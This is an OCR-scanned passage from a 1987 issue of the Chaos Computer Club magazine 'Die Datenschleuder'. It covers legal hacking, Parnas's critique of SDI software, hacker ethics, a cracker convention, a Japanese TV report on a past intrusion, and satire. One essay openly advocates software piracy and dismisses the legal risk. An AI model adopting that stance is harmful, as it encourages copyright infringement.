Wirkung im Erfolgsfalle umso größer. Schließlich ist der Hack dann unter erschwerten Umständen geglückt. Fraglich ist natürlich, ob sich die erforderlichen Einwilligungen bekommen ließen. Das hängt ganz von dem jeweiligen Betroffenen ab, und wie man ihm das Projekt verkauft. Einerseits wird das po­ tentielle Opfer eines Hacks kein Interesse daran haben, daß öffentlich vorgeführt wird, wie unge­ nügend seine Sicherheitsmaßnahmen sind. Ande­ rerseits würde er sich gewiß gerne damit brüsten können, daß sein System nicht geknackt werden konnte. Außerdem erhielte er praktisch eine ko­ stenlose Sicherheitsüberprüfung, für die sich man­ che Unternehmen in den USA teure “Haus-undHof-Hacker“ halten. Überzeugen können alle diese Varianten nicht. Da­ her sollte untersucht werden, wie man Aktionen starten kann, bei denen man sich erst gar nicht strafbar macht. So gesehen ist es vielleicht gar nicht so unwahr­ scheinlich, legale Hacks machen zu können. Ich denke, daß diese Möglichkeit näher untersucht wer­ den sollte. Unterm Strich ist sie wohl für alle Be­ teiligten die beste aller möglichen Lösungen. Da, wie in den ersten Teilen dargestellt, praktisch keine Möglichkeit besteht, einen erfolgreichen Hack durchzuführen, ohne mit Strafgesetzen in Konflikt zu geraten, gibt es nur noch eine Möglichkeit: Bloß Stoepsel Die Datenschleuder CLINCH/DS-RED/STOEPSEL/30.09.87/23:27/12330 11 Bit-Dschungel Software in der SDI- Der Leiter der University of Victoria, Victoria, Canada; Navel Research Laboratory, Washing­ ton, D.C.) gegenüber der SDI-Organistion hat seinen Verzicht auf die weitere Mitarbeit im Aus­ schuß für computergestützte Kriegsführung dar­ gelegt. Im Folgenden werden einige Auszüge sei­ ner Begründung wiedergegeben. Dabei sind wörtlich übersetzte Zitate in Anführung (’) ein­ geschlossen. Einleitend weist Prof. Pamas darauf hin, daß seine Schlußfolgerung, daß seine Arbeit des Ausschusses nutzlos sei, nicht politisch motiviert ist. In der Ver­ gangenheit hat er sich nicht geweigert, an militärisch geförderten Forschungsprojekten mitzuwirken. ’Meine Schlußfolgerungen basieren auf mehr als 20-jähriger Forschung in der Softwareentwicklung, einschließlich einer mehr als 8-jährigen Entwick­ lungsarbeit an Software für Realzeitsysteme, die für Militärflugzeugen eingesetzt werden.Sie beruht auf der Vertrautheit sowohl mit militärisch genutzter Software als auch mit der Forschung in der Computer-Wissenschaft.’ Seine Begründung ist in acht jeweils zwei bis drei Seiten langen Artikeln niedergelegt: 1) Warum arbeitet Software unzuverlässig ? 2) Warum das SDI-Softwaresystem nicht ver­ trauenswürdig sein wird. 3) Warum bei konventioneller Softwareentwicklung keine zuverlässigen Programme entstehen. 4) Die Grenzen der Methoden des Softwareengi­ neerings. 5) Künstliche Intelligenz und SDI. 6) Kann automatisierte Programmierung das SDISoftware-Problem lösen ? 7) Kann Programmverifikation die SDI-Software vertrauenswürdig machen ? 8) Ist die SDI-Organisation ein effizienter Weg er­ folgreiche Forschung zu ermöglichen ? 12 zu 1) Für Softwareprodukte wird häufig eine Garantie­ leistung ausgeschlossen Das liegt daran, daß Indu­ strieprodukte mit analog arbeitenden Maschinen er­ zeugt werden und die Funktionsweise dieser Ma­ schine durch stetige Funktionen beschrieben wer­ den. Die entsprechenden mathematischen Modelle sind entwickelt und seit langem beherrscht. Dem­ gegenüber sind Softwarekomponenten Systeme mit einer sehr großen Anzahl diskreter Zustände. Die zahlreichen Einzelzustände und Wechselwirkungen der Komponenten untereinander können derzeit durch kein mathematisches Modell annähernd voll­ ständig beschrieben werden. Eventuell kann die ma­ thematische Logik für die Softwareentwicklung die Rolle der Analysis in der traditionellen Technik übernehmen. Derzeit reichen diese Methoden jedoch bei Weitem nicht aus, selbst kleine Softwaresysteme zu behandeln. zu 2) Wenn Software die für SDI erforderlichen Eigen­ schaften besitzen soll, muß man sich felsenfest ver­ lassen können, bevor man das gesamte Verteidi­ gungskonzept darauf abstellt. Aus folgenden Grün­ den ist dieser hohe Grad der Zuverlässigkeit nicht erreichbar: 1) Ohne genaue Kenntnis der ballistischen Eigen­ schaften der Ziele, die mit Hilfe der SDI-Software identifiziert, verfolgt und letztlich vernichtet werden sollen, müssen schwerwiegende Fehlreaktionen die Folge sein. Es liegen jedoch keine genauen Infor­ mationen über alle Ziele vor. 2) ’Es wird unmöglich sein, das System unter rea­ listischen Bedingungen vor einem Einsatz zu testen. ’ 3) Da einige Sensoren und Abwehrsysteme über eigene rechnergestützte Leitsysteme verfügen, ent­ steht so ein Gesamtsystem, das wesentlich kompli­ zierter als alle bisherigen Systeme ist. Die Datenschleuder zu 3) Die konventionelle Methode der Softwareentwick­ lung ist, ’wie ein Computer zu denken’. Die Kom­ plexität eines Problems und die Abhängigkeit von Bedingungen, die erst zum Ablaufzeitpunkt ermit­ telt werden, führt stets dazu, daß Softwarefehler bei Tests oder sogar erst während des Einsatzes fest­ gestellt werden. In der Industrie gibt es eigenstän­ dige Arbeitsgruppen, die unabhängig vom Pro­ grammierer Test durchführen (Qualitätssicherung). Diese Möglichkeit steht aber für die SDI-Software nicht zur Verfügung (s. 2)). zu 4) Die wichtigsten Methoden bei der Erstellung großer Softwaresysteme sind: 1) strukturierte Programmierung und der Gebrauch formaler Programmiersprachen 2) formale Spezifikation abstrakter Schnittstellen 3) der Einsatz kooperierender sequentieller Prozes­ se. Anhand eines Projektes der US-Marine zeigt Prof. Parnas auf, warum die Softwareerstellung trotzdem nicht problemlos erfolgen kann. Effizientere Pro­ grammiersprachen und Programmentwicklungs­ werkzeuge können zwar diese Probleme mildem, aber nicht beseitigen. ’Methoden des Software Engineerings verhindern keine Fehler. ... die erfol­ greiche Anwendung dieser Methoden hängt ab von der Erfahrung, die mit der Erstellung und Pflege vergleichbarer Systeme gesammelt wurde. Es gibt keinen derartigen Erfahrungsschatz für das SDIKriegsführungssystem. ... Ich gehe davon aus, daß auch die Forschung der nächsten 20 Jahre keine Aenderung dieser Tatsache erbringen wird.’ Observatorium an Kontroll­ zentrum Die Rakete ist 800 Kilometer entfernt. Der Atommotor hat automatisch gezündet zu 5) Da insbesondere auch eine so moderne Technologie wie die der künstlichen Intelligenz im Rahmen der SDI-Forschung eine große Rolle spielen soll, warnt Prof. Pamas vor übertriebenen und unrealistischen Erwartungen (’Künstliche Intelligenz stellt keinen Zauber zur Lösung unserer Probleme dar. Insbe­ sondere ist der Einsatz von Computersystemen, de­ ren Problemlösungsstrategien denen menschlicher Experten nachempfunden ist, gefährlich, da sich die Regeln, die man aus der Beobachtung der men­ schlichen Handlungsweise gewinnt, als inkonsi­ stent, unvollständig und ungenau heraussteilen. Die Datenschleuder zu 6) Nach Meinung von Prof. Pamas ist automatisierte Programmierung nichts ohne (algorithmische) Pro­ grammiersprachen, aber Fehlerfreiheit garantieren sie auch nicht. ’Außerdem ist eines der grundlegenden Probleme bei SDI, daß uns die Information fehlt, vertrauens­ würdige Spezifikationen aufzuschreiben.’ zu 7) Abgesehen davon, daß bisher nur für im Vergleich zur SDI-Software kleinen Programmen eine Ver­ ifikation erfolgreich durchgeführt wurde, muß vor einer Verifikation zunächst eine vollständige Pro­ grammspezifikation vorliegen (s. 2), 6)). Außerdem soll die SDI-Software auch dann noch funktionsfä­ hig bleiben,selbst wenn Teile des Gesamtsystems zerstört sind. Es gibt aber bisher, trotz 20-jähriger Forschung auf diesem Gebiet, ’keine Beweistechniken für die Kor­ rektheit eines Programms beim Auftreten nicht vor­ hersehbarer Bedrohung bleiben. (..) Der Präsident und die Öffentlichkeit müssen dies wissen.’ CLINCH/POLITIK/HHNET/17.08.87/17:27/6617 Z. 13 What to know about Data Tra­ vellers Datenreisen und Hackerethik Anläßlich des Bit Bang im September 1987 stellt sich von neuem die Frage nach der Ethik der Hackerkultur. Die meisten Statments des CCC in Bezug auf die Lebensweise der Hacker gehen in die Richtung: Hacken ist ein (Lebens-)Einstellung, die auf Neugier beruht. Diese äußert sich im Hinterfragen auch der scheinbar feststehendsten Dinge dieser Welt. Die Antworten, die die Hacker finden, entsprechen oft nicht den angeblich so feststehenden Tatsachen. Es ist der gleiche Wissensdrang, der das Wissen der Menschheit seit Jahrhunderten vorantreibt. Trotzdem bleibt es eine Herangehensweise, die den meisten Menschen fremd ist. Hacken bedeutet stän­ dige Selbstbeobachtung und -Kontrolle, gleichzeitig eine Offenheit für die abwegigsten Ideen. Wichtig ist nur eines: daß die Idee weiter auf dem eingeschla­ genen Pfad führt. gen weiterzugeben. Kritik ist neben Kreativität der stärkste Motor auf dem Weg zu mehr Wissen. Ein Vorwurf lautet, Hacker würden gegen Gesetze verstoßen. Erstens einmal stellt sich da die Frage: gegen Ge­ setze welchen Landes verstoßen sie denn nun, wenn sie aus Land A via Land B, C und D nach Land E Datenreisen. Nach bundesrepublikanischer Recht­ sauffassung können sie gemäß bundesdeutschem Recht verurteilt werden, auch wenn Land E Papua Neu-Ginuea heißt. Eine Meinung, mit der die Bun­ desrepublik ziemlich einsam auf weiter Flur steht. Zudem hielt der Gesetzgeber in seinen Erläuterun­ gen zum 2. Wirtschaftskriminalitätsgesetz fest, daß Hacken als solches nicht strafbar gemacht werden soll. Weiterhin hat der Hacker Erfahrungen gemacht, die ihm sein Wissen, sprich seine Macht, vor Augen führt und gleichzeitig die Ohnmacht der meisten anderen Menschen deutlich macht. Kaum einer ist dazu mehr berufen, die Fähigkeiten und Schwächen eines Computers zu beurteilen als ein Hacker, der sich intensiv mit dem Rechner auseinandergestzt hat. Es fragt sich außerdem, ob man Personen bestrafen sollte, die der Gesellschaft mit ihrer angeblich so verwerflichen Tat einen Dienst erwiesen haben. Maßgeblich beeinflußt wird diese Frage natrlich dadurch, daß in vielen Fällen Fehler der Compu­ terhersteller Ursache für Hacks sind. Soll man nun diejenigen bestrafen, die diese Fehler aufspürten, oder diejenigen, die sie verursachten? Sie haben Respekt vor den Leuten, die noch ein Stückchen weiter sind als sie: die Systemhersteller. Sie verabscheuen Leute, die Daten oder Rechner zerstören, denn sie wissen nicht nur um deren In­ formationsgehalt sondern auch um die Mühe, diesen zu erstellen. Hacker sind oft schwer zu begreifende Individuen, doch sollte das alle anderen dieser Weltengesell­ schaft nicht dazu verleiten, sie zu verachten. Das würde bedeuten, daß man sich vor der Wahrheit versteckt. Hacker warnen nicht ohne Grund seit Jahren vor den Schwächen und Grenzen der Systeme. Sie wissen, wovon sie reden. Meist kennen sie nicht nur das, was der normale Benutzer von den Systemen sieht. Hac­ ker sind keine Anhänger blinden Glaubens an den Großen Bruder Computer. In einer Gemeinschaft sollte jeder einen Teil der Arbeit machen. Hacker tragen Ihren Teil zur Ge­ meinschaft bei, indem sie versuchen ihre Erfahrun- 14 Asterix Zum Schluß ein Hinweis auf zwei Bücher: Steven Levy, “Hackers - Heroes Of The Computer Revolution“, Anchor Press/Doubleday, Garden City, New York, 1984 Bill Landreth, “Out Of The Inner Circle - A Hackers Guide To Computer Security“, Microsoft Press, Was­ hington, 1984 (auf Deutsch bei Goldmann) Die Datenschleuder Stop and Go Hack’n’Crack 2.CSS Summa Convention in Stuttgart. ’Bitte haben Sie Verständnis, wenn es zu Verzö­ gerungen in der Bearbeitung kommt, wir haben auf Computer umgestellt.’ Dieser Spruch kennzeichnet vielfach die Irrungen und Wirrungen, die sich bei der Einführung neuer Technologien ergeben. Besonders wirkungsvoll geht dabei wieder einmal die Post vor, die unlängst mehrere Laserdrucker erworben hat und versucht, mit den professionellen Geldinstituten Schritt zu halten. Bei denen gibt es ja schon seit Jahren die scheckgrossen rot-gelben Formulare, mit denen man fast alle Geldgeschäfte erledigen kann, ohne an seine Hausbank gebunden zu sein. Beleggebundener Zahlungs-verkehr nennt sich diese Buchungstechnik und ist ohne entsprechende Rechnerkapazität nicht zu bewältigen. Bei der Post versucht man es trotzdem. Und erzeugt so lange Schlangen vor den Schaltern und lange Gesichter bei den Schalterbeamten. Getreu dem al­ ten Bundeswehrmotto ’Warum Maschinen einset­ zen, wenn man das auch mit Arbeitskraft hinkriegt’ wird aus dem BZV bei Postens ein listengebundener Zahlungsverkehr, dessen höchster Automatisie­ rungsgrad in der Verwendung eines Stempels be­ steht. Und warum dieses? Nicht etwa, weil die neuen Formulare so hübsch bunt sind und den Rechen­ zentren die Gelegenheit geben, die sündteueren La­ serdrucker endlich zu benutzen (das Posthorn auf den Telefonrechnungen ist übrigens vom Design her völlig daneben), sondern weil in naher Zukunft EPOS kommt, der elektronische Postschalter, der ab 1988 den ohnehin knappen Platz im Standard­ schalter noch weiter verringert. Zwar gibt es noch keine entsprechend ausgebildeten Techniker, vom Bedienungspersonal ganz zu schweigen, aber immerhin, EPOS kommt. Und des­ halb gibt es jetzt schon die neuen Formulare, die noch nicht mal die Selbstdurchschreibequalität ha­ ben, die man bei der Bank seit Jahren kennt. Überdies ist es erheblich Zeit - und Energiesparender, statt der neuen Belege einen der guten alten blauen Zahl­ scheine zu benutzen. Oder man greift gleich zur BTX-Kontenführung und erspart sich und dem Schalterpostler eine Menge Stress... Im Wonnemonat Juli fand in Stuttgart wieder ein ’Convention statt. Bekannte Cracker und Hac­ ker aus Deutschland, der Schweiz, Frankreich und Bayern waren angereist. Zwischen Freitag und Sonntag fanden viele keinen Schlaf, da es neben dem Cracken und dem Erfah­ rungsaustausch auch Harddisks (ST), Demos und einen Mega ST-2 zu bestaunen gab. (Der Mega ST konnte nichts, und selbst das nicht lOOprozentig.) Das babylonische Stimmengewirr wurde mittels der Sprachen Englisch und Assembler überwunden, bis zu dem Moment, in dem eine Sicherung etliche Ramdisks und einen Prozessor ins Nirwana schickte. Die Nacht war dem Hacken vorbehalten. Besonders Delphi und eine Schweizer Pad mußten dran glau­ ben. Auf dem Convention hat sich auch gezeigt, daß es einen selbst Hackern nicht immer bekannten (Hi Chaos) Unterschied zwischen Raubkopierern und Crackern gibt. Raubkopierer: - Null Originale - Wissen grade, wie man ein Copy bedient. - Verkaufen illegal Software Cracker: - Machen Programme ’handlicher’ - Haben Dutzende von Originalen - Programmieren wie die Idioten - Hassen raubkopierer und die Pest. DAS ist ein riesiger Unterschied. Sollte vielleicht manchem zu denken gben. Terra goblin Die Datenschleuder 15 Hambulgel Hackel Japanisches Fernsehen zu Gast beim CCC Zwei Jahre „danach“ ist die japanische Öffent­ lichkeit offenbar auf den damaligen (??? hebe) Hack in Tsukuba aufmerksam geworden. Die japanische Fernsehgesellschaft „NHK“ ent­ sandte daher ein mit Ausdrucken von PhineasProtokollen bewaffnetes Fernsehteam, um die be­ treffenden deutschen Hacker zu befragen und ihnen ein wenig auf die Finger zu schauen. Man traf sich bei Steve und beantwortete ersteinmal einige all­ gemeine Fragen zur Tätigkeit und Motivation der CCC’ler sowie einige Einzelheiten des TsukubaZugangs aus Hamburg. Ich grüßte per TV unseren alten Freund Youhei Morita (Network Manager des KEK), der uns damals freundlicherweise privile­ gierte accounts eingerichtet hatte. Natürlich konnte (und wollte?) man nach so langer Zeit nicht alle Einzelheiten des damaligen Hacks zum Besten ge­ ben. Stattdessen einigten wir uns, am Beispiel Autohacking den japanischen Zuschauern, besonders de­ nen unter 18 Jahren, einmal zu demonstrieren, wie wenig technische Infrastruktur als Eintrittskarte für das Globale Dorf notwendig ist. Wir sattelten also die Pferdchen und kämpften uns durch den frühen Feierabendverkehr bis zur Außenalster vor, um den Japanern noch etwas Hamburg als Gratisbeilage mit­ zugeben. Vor einer Datentankstelle Auf dem Randgrün hielten wir zum Aufbau derTV-Gerätschaften. 16 Das Drehbuch hatten wir uns spontan unterwegs ausgedacht: Eleganter Sportwagen mit In­ halt (2 Hacker, ein MultiSpeed und ein Schlabber­ phon) nähern sich, über den staubigen Fußweg ent­ lang der Alster gleitend, der gelben DTankstelle. Ein Hacker steigt aus, das lange Serialkabel langsam abwickelnd, und befestigt das Schlabberphon am Schnorchel zur grossen weiten Welt. Zwanzig Pfen­ nige klimpern leise in den Münzer, dazu Rockmusik aus dem Auto. Der zweite Hacker verharrt vor sei­ nem japanischen Laptop und reizt Datex an... Abtanz. Mit der Verbindung klappte es nicht ganz, da die Konfiguration (mit freundlicher Unterstützung von )auf die Schnelle zusammengestellt worden war. Das jedoch war den Japanern nicht so wichtig, denn daß es funktioniert, glaubten sie uns auch so. Viel wichtiger schien ihnen, das Material so schnell wie möglich nach Japan zu bekommen. Viel­ leicht, damit ihnen keiner die Story abjagen kann (nach 2 Jahren !!). Als wir schon mit dem Abbau begonnen hatten, ließ ich mich mich dazu hinreissen, meinen Koffer vor der Kamera auszupacken. Der Kameramann zeigte sich entzückt, besonders vom Gaslötkolben und der eingepaßten 20 MB Festplatte. Vic. CLINCH/DS-RED/VIC/28.08.87/00:51/2679 Z. Die Datenschleuder COMMUNITY COMPUTING ’87 Report now available If you were at Community Computing ’87 in January, you’ll want a copy of the report, to remind you of all those names, ideas, wonderful times, awful kitchen staff and what it was like the weekend before Britain ground to a halt in snow­ drifts. If you weren’t there you’ll need a copy to realise just how much you missed. To remind you - it includes items on: - access to computers for disabled people - access to training - funding computer projects - women & new technology Copies of the report are available from: Joy Bryant Community Computing in Newcastle 2nd floor, Low Friar House 36-42 Low Friar St Newcastle upon Tyne NE1 5UE Send 1.50 per copy (inc postage) with your order. Cheques should be made payable to COMMUNITY COMPUTING NETWORK Please pass this mes­ sage on to your friends, colleagues, anyone. CCN Regional Reps on Geonet (Aug 87): LYNDA.GARFIELD South Wales SUNNYHILL Cumbria CCIN North East AND general enquiries R.HASELGROVE West Yorks JULIAN.TODD West Country PETEROWAN Kent & E. Sussex AND membership applications LITRU London For other CCN members use the Geonet command LIST CCN-ML COMPOST:SERVER 5-Aug-87 15:27 CLINCH/ALLGEMEINES/HHNET/05.08.87 Die Datenschleuder 17 Das Mutantenkorps der Post SieUND HUMORREDAKTEUR? PASS ICH NICHT LACHE!! Wird Uri Geller naechster Postminister? Während Parapsychologen in aller Welt sich ver­ zweifelt bemühen, den wissenschaftlichen Nach­ weis der Existenz übersinnlicher Phänomene wie Telekinese, Telepathie, Telefonieren und der­ gleichen zu erbringen, ist die Deutsche Bundes­ post mal wieder einen Schritt weiter. FERNWIRKEN heißt das Stichwort, mit dem die Post in den Bereich des Übersinnlichen vorstoßen will. Im kurzen Amtsenglisch: TEMEX. Derzeit gibt es noch erhebliche Schwierigkeiten, eine genügende Zahl geeigneter Medien zu verbeamten, daher setzt man amtlicherseits auf Altbewährtes, nämlich die Mikroprozessortechnik. Wo früher ein simples Relais ausreichte, um einen Einbruch zu melden und die Ordnungshüter in Marsch zu setzen, waltet heute der Computer und simuliert für nur noch DM 8.50 je Monat (Preisfrage: Woher kennen wir diesen Betrag?) einen schlichten Schaltkontakt, der dem gestressten Yuppie am Strand der Costa Quanta beispielsweise mitteilt, daß das heimische Aquarium seinen Inhalt in die dar­ unterliegenden Wohnungen entleert hat. Zu allem Überdruß darf sowas nur einmal im Monat passieren. Neigt das Aquarium zu periodischer Leckage, wird es automatisch teurer. Der technisch versierte Leser wird sich zu Recht fragen, warum ein Ereignis, das technisch gesehen dem Abheben des Telefonhörers entspricht, plötzlich so teuer wird. Der Grund dafür liegt wohl im geplanten Ersatz der störanfaelligen Technik durch medial begabte Postler, deren Ar­ beitsplatz finanziert sein will. Eine weitere Ausbaustufe von TEMEX sieht unter anderem die Fernablesung von Messgeräten vor. Die hiesigen Wasserwerke erwägen bereits ernsthaft, Gebrauch davon zu machen, um endlich litergenau feststellen zu können, wann die Pause des Länder­ spiels begonnen hat. Unter Zurückstellung erhebli­ cher datenschutzmäßiger Bedenken entsteht hier durch die Fernablesung der Wasseruhren eine Al­ ternative zum TED, der den neuen Medien - im wahrsten Sinne des Wortes - nicht mehr das Wasser reichen kann. Humor fördert Kreativität und Produktivität Hamburg (clinch) - Spaß und Humor steigert die Kreativität, sagt die Psychologin Dr. Alice M. Isen von der University of Maryland in Balti­ more. So konnte sie feststellen, daß die Kreati­ vität von Versuchspersonen deutlich höher war, wenn sie gerade einen lustigen Film gesehen hat­ ten. Sie lösten dann zum Beispiel deutlich schnel­ ler das Problem, eine Kerze mittels Heftzwecken so an einer Korkwand zu fixieren, daß sie nicht tropft - indem sie kurzerhand die Schachtel für die Zwecken an die Wand hefteten und als Ker­ zenhalter entfremdeten. “Unerfreute“ Zeitge­ nossen waren dagegen meist Opfer einer “funk­ tionalen Fixiertheit“, das heißt, sie tendierten dazu, die vorgelegten Objekte nur ihrer üblichen Bestimmung gemäß zu verwenden. Der Psychologe Davin Abramis von der California State University in Long Beach stellte laut New York Times bei der Untersuchung von 382 Personen fest, daß jene am erfolgreichsten waren und mit ihren Kollegen am besten auskamen, die in ihrer Arbeit auch Spaß sahen. Eine wichtige Quelle hierfür war das Scherzen mit Kollegen. Daß Humor Kindern das Lernen erleichtert, stellt Dr. Dolf Zillman im Handbook of Humor Research (Springer Verlag) fest. Er warnt allerdings vor Iro­ nie, die junge Kinder meist nicht verstehen und empfiehlt, möglichst über Dinge zu witzeln, die nicht gerade Lerngegenstand sind. Bei Jugendlichen und Studenten hingegen kommen bezugsfremde Scherze eher schlecht an. Generell kommt dem ge­ meinsamen Lachen eine wichtige soziale Funktion zu, indem es einen unausgesprochenen Konsens sig­ nalisiert, insbesondere bei “heiklen“ Themen. Aus DIE ZEIT Nr.36, 28. August 1987 goblin postmu22.ds 220787 2047 18 jwi 060506 Sep 87 BEREICH CLINCH HUMOR CLINCH/ALLGEMEINES/UGE/07.09.87/05:11/1703 Z. Die Datenschleuder BüCHER (1) EARN Remingway Wem die BELL-Norm schlägt (2) Karl May Der Satz im Silbensee Einführung in die unstrukturierte Textverarbeitung (3) Karl Juni Winneone (4) Karl Juli (11) Jack Tramiel (Hrsg.) Winnetwo Der Untergang des ROM (5) Marcel Plus (12) Agatha Christie Auf der Suche nach dem verlorenen Byte Reset am Nil (13) Astrid Linkdröhn Pippi Langwort DUWEISSTZUVIEL!!! (14) Christian Manmußdasmal Anderssehn Peterchens Druckeranpassung (15) Johann Vorgang von Göte Die Leiden des jungen Konverter (16) Hermann Hesse Das Magnetblasenspiel (17) Euripides Ariadne auf Nixdorf (18) William Scheckspeare (6) W. Irrsinn Zen oder die Kunst, undokumentierten Code zu warten King Clear (19) Ready Miller Stille Tage in CLINCH (7) Charles Bugkowski Gedichte, die einer schrieb, bevor er seinen Edi­ tor aus dem zehnten Stockwerk warf (20) Marquis de Start Quälcode (8) Tracy Kleinbahn (21) Ladislaus Freiherr von Software-Masoch Die Seele einer neuen Schiene Wie ich lernte, Public-Domain-Programme zu lieben (9) Harun Digit Al Rashid Ali Gaga und die vierzig Zeichen (22) Kerningham/Ritchie Volksmärchen Printbad der C-Fahrer (10) Raymond Handler (23) Ian Lemming Der lange Code zum kurzen Absturz For your AI only Die Datenschleuder 19 Raubkopieren Vorweg: die ganze Diskussion um die Raubko­ piererei ist im Grunde ohnehin sinnlos, denn kopiert wird ohnehin - egal, wie gut die Argu­ mente der Kopiergegner auch sein mögen. Dennoch - damit empfindsame Gemüter keine Ge­ wissensbisse kriegen - hier einige wie ich finde schlagende Argumente für die sog. “Raub“kopiererei: Die Gegner der “Raubkopiererei“ (hauptsächlich Softwarefirmen, komisch, nicht war?) haben sich dennoch einige Argumente gegen diese Form des Vertriebes ausgedacht. Sie sind es wert, einmal unter die Lupe genommen zu werden. Eines der wichtigsten lautet: Kopieren fügt den Fir­ men erheblichen finanziellen Schaden zu, jede un­ autorisierte Kopie ist ein Verdienstausfall für die Herstellerfirma. In der Praxis sieht es in der Regel so aus, daß Mikrocomputersoftware von kommerziellen An­ wendern häufig gekauft wird, private Anwender dagegen lieber auf preisgünstigere Raubkopien zu­ rückgreifen. Daraus zu folgern, kommerzielle An­ wender seien in irgendeiner Form den privaten Ko­ pierern moralisch überlegen, ist Unsinn. Kommer­ zielle Anwender kaufen eher, weil a) bei ihnen die Gefahr der Entdeckung grösser ist als bei privaten (Kundenverkehr, ärgerliche Mitarbeiter u.ä.) b) weil kommerziellen Anwendern oft die erfor­ derlichen Verbindungen zur Kopiererszene fehlen und das Aufbauen dieser Verbindungen oft teurer und riskanter ist, als die Software zu kaufen c) kommerzielle Anwender mehr als private auf den Support der Software angewiesen sind und d) weil, wenigstens in einigen Bereichen, die Pro­ duktivitätssteigerung durch Software so immens ist, daß die Anschaffungskosten verglichen damit lä­ cherlich gering erscheinen e) weil in einigen Bereichen EDV-Investitionen so­ gar noch stärker als andere Investitionen steuermindernd wirken. Wie man sieht, fünf gute Gründe für den kommer­ ziellen Anwender, Software zu kaufen. Alle diese Gründe fallen für die privaten Anwender, also für Dich und mich, weg. Und - Du und ich kaufen ja auch so gut wie nie Software, oder? Im Grunde ist doch der Softwaremarkt eine sehr soziale Veranstaltung: Fi­ nanzkräftige Käufer kaufen die Software, finanzie­ ren somit die Entwicklungskosten, finanzschwache private Anwender ziehen sich eben Kopien. Eigenlich sollten alle zufrieden sein. 20 Diese Argument ist nicht ganz von der Hand zu weisen. Allerdings gilt es nur in stark abge­ schwächter Form. Bsp.: ein entfernter Bekannter von mir hat sich kürzlich für seinen privaten Bedarf ein Statistikprogramm beschafft - natürlich kosten­ los. Dieses Programm hätte ihn, legal gekauft, läp­ pische 18.000 DM gekostet. Es ist natürlich Unsinn anzunehmen, er hätte es für diesen Preis gekauft. Außerdem: was interessiert mich als Anwender die Ertragslage einer Softwarefirma? Eine Softwarefir­ ma ist kein Wohlfahrtsverein. Sie will Geld ver­ dienen. Ich will kein Geld ausgeben. So what? Ein weiteres Argument der Gegner: Kopieren macht die Software teuerer. Nochmal: was interessiert mich, wie teuer Software ist? Ich kaufe sowieso keine. Von niedrigeren Preisen profitieren also oh­ nehin nur kommerzielle Anwender - und für die sind die Kosten für Software im Vergleich mit dem Pro­ duktivitätszuwachs wie gesagt meist vernachlässigbar. Die Datenschleuder Ein besonders herzzerreißendes Argument - fast ein Wunder aus dem Mund der sonst gar nicht so so­ zialen Softwareindustrie - lautet: Die Einbußen, die durch Kopiererei entstehen, gehen zu Lasten der armen, angestellten Programmierer, die um die Früchte ihrer harten Arbeit gebracht werden. Un­ sinn. Erstens: Ein Unternehmen, das angestellte Pro­ grammierer in Abhängigkeit von verkauften Stück­ zahlen bezahlt, wälzt das unternehmerische Risiko (daß das Unternehmen als Rechtfertigung für seine Gewinne benutzt) auf abhängig Beschäftigte ab. Das ist ungerechtfertigt. Ein Programmierer kann sich nicht leisten, von Lust und Laune des Marktes ab­ hängig zu sein, wenn es um sein Einkommen geht. Schließlich ist er abhängig beschäftigt, nicht etwa Unternehmer. Das viele Unternehmen es dennoch schaffen, Programmierer zu derartigen Konditionen zu beschäftigen, liegt teilweise auch am Desinte­ resse derselben an ihren eigenen Rechten. Ich kenne jedenfalls genügend Programmierer, die sich alles gefallen lassen, wenn es nur ein paar Mark gibt und sie ordentlich daddeln dürfen. Und selbst wenn ein Programmierer in Abhängigkeit von Stückzahlen bezahlt wird, schadet ihm Kopie­ rerei nur unter der unbewiesenen Annahmen, daß diese die Erträge schmälert. Und noch etwas: Trotz allem Geschrei geht es den meisten Softwarefirmen gelinde gesagt sehr gut. Kaum eine andere Branche hat ähnliche Zuwachsraten zu verzeichnen. Unterm Strich profitiert die Mikrocomputerindustrie sogar von der Kopiererei. Dazu ein paar Beispiele: Der immense Erfolg des C-64 wäre ohne eine gut funktionierende Infrastruktur, die auch den letzten Anwender mit kostenloser Software versorgt, nicht denkbar gewesen. Es ist bekannt, daß bei der Entwicklungs des C-64 eine Maxime war, auf dieser Maschine einen effektiven Kopierschutz schon von der Architektur der Hardware unmöglich zu machen. Commodore will schießlich Hardware verkaufen, und nichts wirbt besser für einen Computer als ko­ stenlose, leicht erhältliche Sofware. Nächstes Beispiel: die Diskettenhersteller. Wie sä­ hen deren Umsätze ohne das segensreiche Tun der Kopierszene aus? Oder: Verlage. Wer kennt nicht die berühmte Buchreihe “Das Buch zu ihrer Raub­ kopie“, die mittlerweile fast jeder im Mikrocom­ puterbereich tätige Verlag im Programm hat. Es ist kein Geheimnis, daß z.B. Data Becker, einer der militantesten Gegner der Raubkopiererei, von ein­ igen Buchtiteln mehr verkauft hat, als von dem dazugehörigen Programm. Weiter: Kopien machen ein Programm bekannt. Die Wirtschaft verlangt nach Kräften mit EDVErfahrung. Wenn sie junge Leute mit ComputerErfahrung einstellen: womit haben die ihre Erfah­ rungen gesammelt? Mit gekaufter Software? Wohl nur selten. “Raub“kopien können sogar die Umsätze von Softwarefirmen steigern. Angenommen, ich ha­ be zu Hause ca. 7 verschiedene Textprogramme rumfliegen - alle natürlich selbst kopiert - und arbeite nun vorzugsweise mit, sagen wir, MS WORD. Ich werde nun von einer Firma eingestellt und ent­ scheide mit über die Anschaffung eines Satzes von Textprogrammen. Für welches werde ich mich ausssprechen? Erraten! Natürlich gibt es bei der Kopierei juristische Pro­ bleme. Nur: wen interessieren die? Wer sich nicht erwischen lässt, hat nichts zu befürchten. Die Fälle, in denen private Kopierer, die nicht mit geklauter Software gehandelt haben (was ich übrigens ableh­ ne) kann mensch an den Fingern einer Hand abzählen. Also alles in Ordnung? Fast. Der Kopierer hat leider immer noch oft das Problem, an Dokumentation heranzukommen. Oft rennt er zum Kopierladen oder kauft Bücher aus der oben erwähnten Buchreihe. Warum findet sich nicht mal jemand, der zu be­ kannter Standardsoftware Dokumentation auf Dis­ ketten vertreibt, die einfach mit der Software zu­ sammen kopiert werden kann? Technisch ist das doch überhaupt kein Problem. Hier muß noch ein­ iges passieren. Mich interessiert auch, wie andere über dieses Thema denken: Beiträge erwünscht. Caesar/Stoepsel CLINCH/DS-RED/CAESAR/02.10.87/19:54/7438 Z. Die Datenschleuder 21 Goldenes Kalb Zum Querfunkratschlag in Berlin Der folgende Text ist eine Kritik zu einem Beitrag für die Veranstaltung “Informationsgesellschaft - das goldene Kalb der POST-Moderne“ am Sonntag, 6.9.87 neben der Funkausstellung. Der Beitrag selber liegt nur in gedruckter Form vor, unsere 